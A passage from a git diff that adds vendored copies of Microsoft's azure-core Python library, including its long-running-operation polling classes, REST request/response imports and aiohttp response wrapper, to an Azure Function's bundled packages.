EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from ..exceptions import HttpResponseError +from .base_polling import ( + _failed, + BadStatus, + BadResponse, + OperationFailed, + LROBasePolling, + _raise_if_bad_http_status_and_method, +) +from ..pipeline._tools import is_rest + +__all__ = ["AsyncLROBasePolling"] + + +class AsyncLROBasePolling(LROBasePolling): + """A subclass or LROBasePolling that redefine "run" as async. + """ + + async def run(self): # pylint:disable=invalid-overridden-method + try: + await self._poll() + + except BadStatus as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + except BadResponse as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + message=str(err), + error=err + ) + + except OperationFailed as err: + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + async def _poll(self): # pylint:disable=invalid-overridden-method + """Poll status of operation so long as operation is incomplete and + we have an endpoint to query. + + :param callable update_cmd: The function to call to retrieve the + latest status of the long running operation. + :raises: OperationFailed if operation status 'Failed' or 'Canceled'. + :raises: BadStatus if response status invalid. + :raises: BadResponse if response invalid. + """ + + while not self.finished(): + await self._delay() + await self.update_status() + + if _failed(self.status()): + raise OperationFailed("Operation failed or canceled") + + final_get_url = self._operation.get_final_get_url(self._pipeline_response) + if final_get_url: + self._pipeline_response = await self.request_status(final_get_url) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + + async def _sleep(self, delay): # pylint:disable=invalid-overridden-method + await self._transport.sleep(delay) + + async def _delay(self): # pylint:disable=invalid-overridden-method + """Check for a 'retry-after' header to set timeout, + otherwise use configured timeout. + """ + delay = self._extract_delay() + await self._sleep(delay) + + async def update_status(self): # pylint:disable=invalid-overridden-method + """Update the current status of the LRO. + """ + self._pipeline_response = await self.request_status( + self._operation.get_polling_url() + ) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + self._status = self._operation.get_status(self._pipeline_response) + + async def request_status(self, status_link): # pylint:disable=invalid-overridden-method + """Do a simple GET to this status link. + + This method re-inject 'x-ms-client-request-id'. + + :rtype: azure.core.pipeline.PipelineResponse + """ + if self._path_format_arguments: + status_link = self._client.format_url(status_link, **self._path_format_arguments) + # Re-inject 'x-ms-client-request-id' while polling + if "request_id" not in self._operation_config: + self._operation_config["request_id"] = self._get_request_id() + if is_rest(self._initial_response.http_response): + # if I am a azure.core.rest.HttpResponse + # want to keep making azure.core.rest calls + from azure.core.rest import HttpRequest as RestHttpRequest + request = RestHttpRequest("GET", status_link) + return await self._client.send_request( + request, _return_pipeline_response=True, **self._operation_config + ) + # if I am a azure.core.pipeline.transport.HttpResponse + request = self._client.get(status_link) + + return await self._client._pipeline.run( # pylint: disable=protected-access + request, stream=False, **self._operation_config + ) + +__all__ = [ + 'AsyncLROBasePolling' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py new file mode 100644 index 0000000..b8c4e51 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/base_polling.py @@ -0,0 +1,639 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc +import base64 +import json +from enum import Enum +from typing import TYPE_CHECKING, Optional, Any, Union + +from ..exceptions import HttpResponseError, DecodeError +from . import PollingMethod +from ..pipeline.policies._utils import get_retry_after +from ..pipeline._tools import is_rest +from .._enum_meta import CaseInsensitiveEnumMeta + +if TYPE_CHECKING: + from azure.core.pipeline import PipelineResponse + from azure.core.pipeline.transport import ( + HttpResponse, + AsyncHttpResponse, + HttpRequest, + ) + + ResponseType = Union[HttpResponse, AsyncHttpResponse] + PipelineResponseType = PipelineResponse[HttpRequest, ResponseType] + + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +_FINISHED = frozenset(["succeeded", "canceled", "failed"]) +_FAILED = frozenset(["canceled", "failed"]) +_SUCCEEDED = frozenset(["succeeded"]) + +def _finished(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _FINISHED + + +def _failed(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _FAILED + + +def _succeeded(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _SUCCEEDED + + +class BadStatus(Exception): + pass + + +class BadResponse(Exception): + pass + + +class OperationFailed(Exception): + pass + + +def _as_json(response): + # type: (ResponseType) -> dict + """Assuming this is not empty, return the content as JSON. + + Result/exceptions is not determined if you call this method without testing _is_empty. + + :raises: DecodeError if response body contains invalid json data. + """ + try: + return json.loads(response.text()) + except ValueError: + raise DecodeError("Error occurred in deserializing the response body.") + + +def _raise_if_bad_http_status_and_method(response): + # type: (ResponseType) -> None + """Check response status code is valid. + + Must be 200, 201, 202, or 204. + + :raises: BadStatus if invalid status. + """ + code = response.status_code + if code in {200, 201, 202, 204}: + return + raise BadStatus( + "Invalid return status {!r} for {!r} operation".format( + code, response.request.method + ) + ) + + +def _is_empty(response): + # type: (ResponseType) -> bool + """Check if response body contains meaningful content. + + :rtype: bool + """ + return not bool(response.body()) + + +class LongRunningOperation(ABC): + """LongRunningOperation + Provides default logic for interpreting operation responses + and status updates. + + :param azure.core.pipeline.PipelineResponse response: The initial pipeline response. + :param callable deserialization_callback: The deserialization callaback. + :param dict lro_options: LRO options. + :param kwargs: Unused for now + """ + + @abc.abstractmethod + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + raise NotImplementedError() + + @abc.abstractmethod + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + raise NotImplementedError() + + @abc.abstractmethod + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + raise NotImplementedError() + + @abc.abstractmethod + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Return the status string extracted from this response.""" + raise NotImplementedError() + + @abc.abstractmethod + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + raise NotImplementedError() + +class _LroOption(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Known LRO options from Swagger.""" + + FINAL_STATE_VIA = "final-state-via" + + +class _FinalStateViaOption(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Possible final-state-via options.""" + + AZURE_ASYNC_OPERATION_FINAL_STATE = "azure-async-operation" + LOCATION_FINAL_STATE = "location" + OPERATION_LOCATION_FINAL_STATE = "operation-location" + + +class OperationResourcePolling(LongRunningOperation): + """Implements a operation resource polling, typically from Operation-Location. + + :param str operation_location_header: Name of the header to return operation format (default 'operation-location') + :keyword dict[str, any] lro_options: Additional options for LRO. For more information, see + https://aka.ms/azsdk/autorest/openapi/lro-options + """ + + def __init__( + self, operation_location_header="operation-location", *, lro_options=None + ): + self._operation_location_header = operation_location_header + + # Store the initial URLs + self._async_url = None + self._location_url = None + self._request = None + self._lro_options = lro_options or {} + + def can_poll(self, pipeline_response): + """Answer if this polling method could be used. + """ + response = pipeline_response.http_response + return self._operation_location_header in response.headers + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + return self._async_url + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + if ( + self._lro_options.get(_LroOption.FINAL_STATE_VIA) == _FinalStateViaOption.LOCATION_FINAL_STATE + and self._location_url + ): + return self._location_url + if ( + self._lro_options.get(_LroOption.FINAL_STATE_VIA) + in [ + _FinalStateViaOption.AZURE_ASYNC_OPERATION_FINAL_STATE, + _FinalStateViaOption.OPERATION_LOCATION_FINAL_STATE + ] + and self._request.method == "POST" + ): + return None + response = pipeline_response.http_response + if not _is_empty(response): + body = _as_json(response) + # https://github.com/microsoft/api-guidelines/blob/vNext/Guidelines.md#target-resource-location + resource_location = body.get("resourceLocation") + if resource_location: + return resource_location + + if self._request.method in {"PUT", "PATCH"}: + return self._request.url + + if self._request.method == "POST" and self._location_url: + return self._location_url + + return None + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + self._request = pipeline_response.http_response.request + response = pipeline_response.http_response + + self._set_async_url_if_present(response) + + if response.status_code in {200, 201, 202, 204} and self._async_url: + return "InProgress" + raise OperationFailed("Operation failed or canceled") + + def _set_async_url_if_present(self, response): + # type: (ResponseType) -> None + self._async_url = response.headers[self._operation_location_header] + + location_url = response.headers.get("location") + if location_url: + self._location_url = location_url + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process the latest status update retrieved from an "Operation-Location" header. + + :param azure.core.pipeline.PipelineResponse response: The response to extract the status. + :raises: BadResponse if response has no body, or body does not contain status. + """ + response = pipeline_response.http_response + if _is_empty(response): + raise BadResponse( + "The response from long running operation does not contain a body." + ) + + body = _as_json(response) + status = body.get("status") + if not status: + raise BadResponse("No status found in body") + return status + + +class LocationPolling(LongRunningOperation): + """Implements a Location polling. + """ + + def __init__(self): + self._location_url = None + + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + response = pipeline_response.http_response + return "location" in response.headers + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + return self._location_url + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + return None + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + response = pipeline_response.http_response + + self._location_url = response.headers["location"] + + if response.status_code in {200, 201, 202, 204} and self._location_url: + return "InProgress" + raise OperationFailed("Operation failed or canceled") + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process the latest status update retrieved from a 'location' header. + + :param azure.core.pipeline.PipelineResponse response: latest REST call response. + :raises: BadResponse if response has no body and not status 202. + """ + response = pipeline_response.http_response + if "location" in response.headers: + self._location_url = response.headers["location"] + + return "InProgress" if response.status_code == 202 else "Succeeded" + + +class StatusCheckPolling(LongRunningOperation): + """Should be the fallback polling, that don't poll but exit successfully + if not other polling are detected and status code is 2xx. + """ + + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + return True + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + raise ValueError("This polling doesn't support polling") + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running + operation and set self.status attribute. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + return "Succeeded" + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + return "Succeeded" + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + return None + + +class LROBasePolling(PollingMethod): # pylint: disable=too-many-instance-attributes + """A base LRO poller. + + This assumes a basic flow: + - I analyze the response to decide the polling approach + - I poll + - I ask the final resource depending of the polling approach + + If your polling need are more specific, you could implement a PollingMethod directly + """ + + def __init__( + self, + timeout=30, + lro_algorithms=None, + lro_options=None, + path_format_arguments=None, + **operation_config + ): + self._lro_algorithms = lro_algorithms or [ + OperationResourcePolling(lro_options=lro_options), + LocationPolling(), + StatusCheckPolling(), + ] + + self._timeout = timeout + self._client = None # Will hold the Pipelineclient + self._operation = None # Will hold an instance of LongRunningOperation + self._initial_response = None # Will hold the initial response + self._pipeline_response = None # Will hold latest received response + self._deserialization_callback = None # Will hold the deserialization callback + self._operation_config = operation_config + self._lro_options = lro_options + self._path_format_arguments = path_format_arguments + self._status = None + + def status(self): + """Return the current status as a string. + :rtype: str + """ + if not self._operation: + raise ValueError( + "set_initial_status was never called. Did you give this instance to a poller?" + ) + return self._status + + def finished(self): + """Is this polling finished? + :rtype: bool + """ + return _finished(self.status()) + + def resource(self): + """Return the built resource. + """ + return self._parse_resource(self._pipeline_response) + + @property + def _transport(self): + return self._client._pipeline._transport # pylint: disable=protected-access + + def initialize(self, client, initial_response, deserialization_callback): + """Set the initial status of this LRO. + + :param initial_response: The initial response of the poller + :raises: HttpResponseError if initial status is incorrect LRO state + """ + self._client = client + self._pipeline_response = self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + for operation in self._lro_algorithms: + if operation.can_poll(initial_response): + self._operation = operation + break + else: + raise BadResponse("Unable to find status link for polling.") + + try: + _raise_if_bad_http_status_and_method(self._initial_response.http_response) + self._status = self._operation.set_initial_status(initial_response) + + except BadStatus as err: + self._status = "Failed" + raise HttpResponseError(response=initial_response.http_response, error=err) + except BadResponse as err: + self._status = "Failed" + raise HttpResponseError( + response=initial_response.http_response, message=str(err), error=err + ) + except OperationFailed as err: + raise HttpResponseError(response=initial_response.http_response, error=err) + + def get_continuation_token(self): + # type() -> str + import pickle + return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii') + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple + try: + client = kwargs["client"] + except KeyError: + raise ValueError("Need kwarg 'client' to be recreated from continuation_token") + + try: + deserialization_callback = kwargs["deserialization_callback"] + except KeyError: + raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token") + + import pickle + initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec + # Restore the transport in the context + initial_response.context.transport = client._pipeline._transport # pylint: disable=protected-access + return client, initial_response, deserialization_callback + + def run(self): + try: + self._poll() + + except BadStatus as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + except BadResponse as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + message=str(err), + error=err + ) + + except OperationFailed as err: + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + def _poll(self): + """Poll status of operation so long as operation is incomplete and + we have an endpoint to query. + + :param callable update_cmd: The function to call to retrieve the + latest status of the long running operation. + :raises: OperationFailed if operation status 'Failed' or 'Canceled'. + :raises: BadStatus if response status invalid. + :raises: BadResponse if response invalid. + """ + + while not self.finished(): + self._delay() + self.update_status() + + if _failed(self.status()): + raise OperationFailed("Operation failed or canceled") + + final_get_url = self._operation.get_final_get_url(self._pipeline_response) + if final_get_url: + self._pipeline_response = self.request_status(final_get_url) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + + def _parse_resource(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[Any] + """Assuming this response is a resource, use the deserialization callback to parse it. + If body is empty, assuming no resource to return. + """ + response = pipeline_response.http_response + if not _is_empty(response): + return self._deserialization_callback(pipeline_response) + return None + + def _sleep(self, delay): + self._transport.sleep(delay) + + def _extract_delay(self): + if self._pipeline_response is None: + return None + delay = get_retry_after(self._pipeline_response) + if delay: + return delay + return self._timeout + + def _delay(self): + """Check for a 'retry-after' header to set timeout, + otherwise use configured timeout. + """ + delay = self._extract_delay() + self._sleep(delay) + + def update_status(self): + """Update the current status of the LRO. + """ + self._pipeline_response = self.request_status(self._operation.get_polling_url()) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + self._status = self._operation.get_status(self._pipeline_response) + + def _get_request_id(self): + return self._pipeline_response.http_response.request.headers[ + "x-ms-client-request-id" + ] + + def request_status(self, status_link): + """Do a simple GET to this status link. + + This method re-inject 'x-ms-client-request-id'. + + :rtype: azure.core.pipeline.PipelineResponse + """ + if self._path_format_arguments: + status_link = self._client.format_url(status_link, **self._path_format_arguments) + # Re-inject 'x-ms-client-request-id' while polling + if "request_id" not in self._operation_config: + self._operation_config["request_id"] = self._get_request_id() + if is_rest(self._initial_response.http_response): + # if I am a azure.core.rest.HttpResponse + # want to keep making azure.core.rest calls + from azure.core.rest import HttpRequest as RestHttpRequest + request = RestHttpRequest("GET", status_link) + return self._client.send_request( + request, _return_pipeline_response=True, **self._operation_config + ) + # if I am a azure.core.pipeline.transport.HttpResponse + request = self._client.get(status_link) + return self._client._pipeline.run( # pylint: disable=protected-access + request, stream=False, **self._operation_config + ) + + +__all__ = [ + 'BadResponse', + 'BadStatus', + 'OperationFailed', + 'LongRunningOperation', + 'OperationResourcePolling', + 'LocationPolling', + 'StatusCheckPolling', + 'LROBasePolling', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py new file mode 100644 index 0000000..6552fd5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py @@ -0,0 +1,51 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +try: + from ._rest_py3 import ( + HttpRequest, + HttpResponse, + ) +except (SyntaxError, ImportError): + from ._rest import ( # type: ignore + HttpRequest, + HttpResponse, + ) + +__all__ = [ + "HttpRequest", + "HttpResponse", +] + +try: + from ._rest_py3 import ( # pylint: disable=unused-import + AsyncHttpResponse, + ) + __all__.extend([ + "AsyncHttpResponse", + ]) + +except (SyntaxError, ImportError): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e3076ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc new file mode 100644 index 0000000..e590adb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc new file mode 100644 index 0000000..9ce97e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc new file mode 100644 index 0000000..c0e0bb5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc new file mode 100644 index 0000000..d93623e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc new file mode 100644 index 0000000..8e50100 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc new file mode 100644 index 0000000..7fdd4fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc new file mode 100644 index 0000000..20035cf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc new file mode 100644 index 0000000..8d898f6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc new file mode 100644 index 0000000..9f0401f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py new file mode 100644 index 0000000..1505482 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py @@ -0,0 +1,204 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import collections.abc +import asyncio +from itertools import groupby +from typing import AsyncIterator +from multidict import CIMultiDict +from ._http_response_impl_async import AsyncHttpResponseImpl, AsyncHttpResponseBackcompatMixin +from ..pipeline.transport._aiohttp import AioHttpStreamDownloadGenerator +from ..utils._pipeline_transport_rest_shared import _pad_attr_name, _aiohttp_body_helper +from ..exceptions import ResponseNotReadError + +class _ItemsView(collections.abc.ItemsView): + def __init__(self, ref): + super().__init__(ref) + self._ref = ref + + def __iter__(self): + for key, groups in groupby(self._ref.__iter__(), lambda x: x[0]): + yield tuple([key, ", ".join(group[1] for group in groups)]) + + def __contains__(self, item): + if not (isinstance(item, (list, tuple)) and len(item) == 2): + return False + for k, v in self.__iter__(): + if item[0].lower() == k.lower() and item[1] == v: + return True + return False + + def __repr__(self): + return f"dict_items({list(self.__iter__())})" + +class _KeysView(collections.abc.KeysView): + def __init__(self, items): + super().__init__(items) + self._items = items + + def __iter__(self): + for key, _ in self._items: + yield key + + def __contains__(self, key): + for k in self.__iter__(): + if key.lower() == k.lower(): + return True + return False + def __repr__(self): + return f"dict_keys({list(self.__iter__())})" + +class _ValuesView(collections.abc.ValuesView): + def __init__(self, items): + super().__init__(items) + self._items = items + + def __iter__(self): + for _, value in self._items: + yield value + + def __contains__(self, value): + for v in self.__iter__(): + if value == v: + return True + return False + + def __repr__(self): + return f"dict_values({list(self.__iter__())})" + + +class _CIMultiDict(CIMultiDict): + """Dictionary with the support for duplicate case-insensitive keys.""" + + def __iter__(self): + return iter(self.keys()) + + def keys(self): + """Return a new view of the dictionary's keys.""" + return _KeysView(self.items()) + + def items(self): + """Return a new view of the dictionary's items.""" + return _ItemsView(super().items()) + + def values(self): + """Return a new view of the dictionary's values.""" + return _ValuesView(self.items()) + + def __getitem__(self, key: str) -> str: + return ", ".join(self.getall(key, [])) + + def get(self, key, default=None): + values = self.getall(key, None) + if values: + values = ", ".join(values) + return values or default + +class _RestAioHttpTransportResponseBackcompatMixin(AsyncHttpResponseBackcompatMixin): + """Backcompat mixin for aiohttp responses. + + Need to add it's own mixin because it has function load_body, which other + transport responses don't have, and also because we need to synchronously + decompress the body if users call .body() + """ + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + + Have to modify the default behavior here. In AioHttp, we do decompression + when accessing the body method. The behavior here is the same as if the + caller did an async read of the response first. But for backcompat reasons, + we need to support this decompression within the synchronous body method. + """ + return _aiohttp_body_helper(self) + + async def _load_body(self) -> None: + """Load in memory the body, so it could be accessible from sync methods.""" + self._content = await self.read() # type: ignore + + def __getattr__(self, attr): + backcompat_attrs = ["load_body"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super().__getattr__(attr) + +class RestAioHttpTransportResponse(AsyncHttpResponseImpl, _RestAioHttpTransportResponseBackcompatMixin): + def __init__( + self, + *, + internal_response, + decompress: bool = True, + **kwargs + ): + headers = _CIMultiDict(internal_response.headers) + super().__init__( + internal_response=internal_response, + status_code=internal_response.status, + headers=headers, + content_type=headers.get('content-type'), + reason=internal_response.reason, + stream_download_generator=AioHttpStreamDownloadGenerator, + content=None, + **kwargs + ) + self._decompress = decompress + self._decompressed_content = False + + def __getstate__(self): + state = self.__dict__.copy() + # Remove the unpicklable entries. + state['_internal_response'] = None # aiohttp response are not pickable (see headers comments) + state['headers'] = CIMultiDict(self.headers) # MultiDictProxy is not pickable + return state + + @property + def content(self): + # type: (...) -> bytes + """Return the response's content in bytes.""" + if self._content is None: + raise ResponseNotReadError(self) + return _aiohttp_body_helper(self) + + 